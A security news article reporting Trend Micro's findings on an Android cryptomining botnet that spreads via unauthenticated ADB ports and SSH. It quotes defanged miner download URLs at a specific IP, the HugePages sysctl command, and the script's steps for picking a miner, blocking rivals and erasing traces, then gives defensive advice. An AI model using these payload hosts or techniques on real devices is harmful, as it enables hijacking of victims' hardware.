Android cryptomining botnet is the new bad kid on the block

Security researchers are sounding the alarm about a new cryptomining botnet that, admittedly, does not have a catchy name yet. The cryptomining botnet, as Trend Micro’s Jindrich Karasek reports, leverages open ADB (Android Debug Bridge) ports and spreads via SSH. What allows the cryptomining botnet to prey specifically on Android devices is, according to Karasek, the fact that ADB ports do not authenticate by default which, in turn, allows the malicious code to spread to devices that had a prior SSH connection with the infected host.

Karasek gives the specifics about the payload in the Android cryptomining botnet in this excerpt from the report:

The script for a.sh reveals that this attack will choose from three different downloadable miners. This can be seen in the output of the “uname -m” command... The uname –m command, once executed, gets the infected system’s information, such as its manufacturer, hardware details, and processor architecture. The output from this command is used as a variable for determining the miner to use in the attack... The three miners that can be used for this attack are listed below, all of which are delivered by the same URL.

  • http://198[.]98[.]51[.]104:282/x86/bash
  • http://198[.]98[.]51[.]104:282/arm/bash
  • http://198[.]98[.]51[.]104:282/aarch64/bash

To optimize the mining activity, the script also enhances the victim’s memory by enabling HugePages, which will help the system support memory pages that are greater than its default size. This ability can be seen in the script as “/sbin/sysctl -w vm.nr_hugepages=128”. This botnet also tries to block its competitor by modifying /etc/hosts... After spreading to other devices connected to the system, it deletes its payload files, removing the traces on the victim host.

While this is not the first cryptomining botnet to be seen in the wild, its ability to form a literal battalion of Android zombie devices is rather concerning. Disabling ADB and also changing default settings should protect you somewhat from becoming a part of the botnet. Being aware of apps that you install should also be a given, but especially in this case as certain apps (according to Trend Micro) can leverage this vulnerability. Finally, there are mobile security applications that detect malicious activity of this specific type that can protect you.

Featured image: Shutterstock

Derek Kortepeter

Derek Kortepeter is a graduate of UCLA and tech journalist that is committed to creating an informed society with regards to Information Security. Kortepeter specializes in areas such as penetration testing, cryptography, cyber warfare, and governmental InfoSec policy.

Share
Published by
Derek Kortepeter

Recent Posts

Exchange 2019: Peaceful coexistence with Exchange 2016

Exchange coexistence has been around for a long time. This can be having Exchange 2010…

4 hours ago

How to check the VM sizes available on your Azure Region

If you want to check VM sizes available to any given region, Azure Portal is…

7 hours ago

Cybersecurity 101: Close the door on open network shares

If you have open network shares on your network, you are opening the door to…

24 hours ago

Spear-phishing email results in U.S. gas pipeline ransomware attack

A spear-phishing email has resulted in a U.S. gas pipeline ransomware attack. Making the attack…

1 day ago

Planning your Azure reserved instances and flexibility groups

To really lower your Azure costs, you need actionable information. Get info on flexibility groups…

1 day ago

MGM Resorts customer data breach still being utilized by hackers

Data stolen from breaches often live on forever, as appears to be the case with…

2 days ago